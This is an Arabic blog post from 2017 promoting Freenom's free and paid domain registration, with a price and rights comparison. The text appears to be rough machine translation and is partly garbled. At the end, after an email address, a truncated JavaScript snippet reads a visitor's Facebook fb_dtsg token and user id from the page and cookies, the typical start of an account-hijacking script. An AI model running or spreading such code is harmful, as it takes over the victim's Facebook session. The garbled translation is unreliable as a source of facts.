lundi 20 février 2017

حول مدونتك اى موقع مجانا


المجالات المجانية و المدفوعة
Freenom هو أول وخالية فقط مزود نطاق العالم. مهمتنا هي جعل الناس على الانترنت، ومساعدة البلدان على تطوير الاقتصاد الرقمي الخاص بها. خال من المجالات تعمل تماما مثل أي اسم المجال الآخر. يمكنك استخدامه لموقع الويب الخاص بك، بلوق الخاص بك، حساب بريد إلكتروني وأكثر! يمكنك اختيار لتشغيل نطاق مجاني مع إعادة توجيه عنوان URL، خدمة DNS مجانا Freenom أو DNS الخاص بك (خوادم اسم). ملحقات النطاقات المتاحة حاليا للتسجيل المجاني:


مجانا، دفعت والمجالات الخاصة
ليس كل المجالات يمكن تسجيل مجانا. ورأى عدد محدود من المجالات "خاص" ويمكن شراؤها فقط. سعرها يختلف ويتم عرض التسعير خلال الاختيار توافر.

على سبيل المثال، تعتبر جميع المجالات 1 و 2 و 3 الطابع، وكذلك كلمات القاموس المشتركة، الخاصة.

كافة المجالات الأخرى (تلك التي ليست الخاصة) يمكن إما شراء (المجال المدفوعة) أو تسجيلها مجانا (نطاق مجاني). مقارنة والاختيار بين خيارين باستخدام الجدول أدناه:

النطاقات المجانية المدفوعة المجالات
TLD متاحة. المعارف التقليدية / م. L. / .GA / .CF / .GQ. المعارف التقليدية / م. L. / .GA / .CF / .GQ
(بما في ذلك مجالات خاص)
الأشغال الاستخدام مثل أي اسم نطاق آخر، استخدام URL الشحن، خدمة DNS مجانا Freenom أو DNS الخاص بك (خوادم اسم). يعمل مثل أي اسم نطاق آخر، استخدام URL الشحن، خدمة DNS مجانا Freenom أو DNS الخاص بك (خوادم اسم).
تسجيل وتجديد 1-12 أشهر
مجانا لتجديد
(التجديد غير محدودة) 1-10 سنوات
(التجديد غير محدودة)
تسعير مجانا! تبدأ الأسعار في 6.95 دولار أمريكي لكل اسم نطاق سنويا. Freenom ينطبق تخفيض متعدد السنوات في كل المجالات. المعارف التقليدية. ويتم تسعير النطاقات الخاصة أعلى، اعتمادا على الاسم.
المدفوعات لا حاجة Freenom دفع يقبل بطاقة الائتمان، باي بال، والمدفوعات البنكية.
الحقوق القانونية أفعال المسجل كمستخدم لاسم النطاق، وليس أعمال المسجل باسم المرخص له المرخص له من اسم النطاق
نقل الحقوق لا شيء. ممتلئ
يبدو Freenom WHOIS أو واحدة من الشركات التابعة لها كما يظهر المرخص له في المسجل WHOIS المجال في WHOIS والمسجل يمكن تحديث بحرية
السياسات يجب أن تتوافق مع سياسات اسم نطاق مجاني Freenom. يجب أن تتوافق مع Freenom دفعت سياسات اسم المجال.

غيرها من نطاقات المستوى الأعلى
Freenom لا تعمل إلا النطاقات الحرة. باعتبارها المسجل ICANN المعتمدين Freenom تعمل معظم المجالات الأخرى المستوى الأعلى أيضا. وأفضل: وتباع هذه المجالات العادية في سعر التكلفة. هذا صحيح - ونحن بيعها بسعر نشتري منهم في التسجيل.

يمكنك الآن إدارة كل ما تبذلونه من المجالات، مجانا أو بأجر، من واجهة واحدة واحدة: في Freenom. نحن نؤيد نطاقات المستوى الأعلى العامة، مثل COM، NET وORG، ولكن أيضا ملحقات نطاق البلاد.

وتباع حتى نطاقات المستوى الأعلى الجديدة مثل .BERLIN أو من الأزرق في سعر التكلفة. مرحبا بكم في Freenom.

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...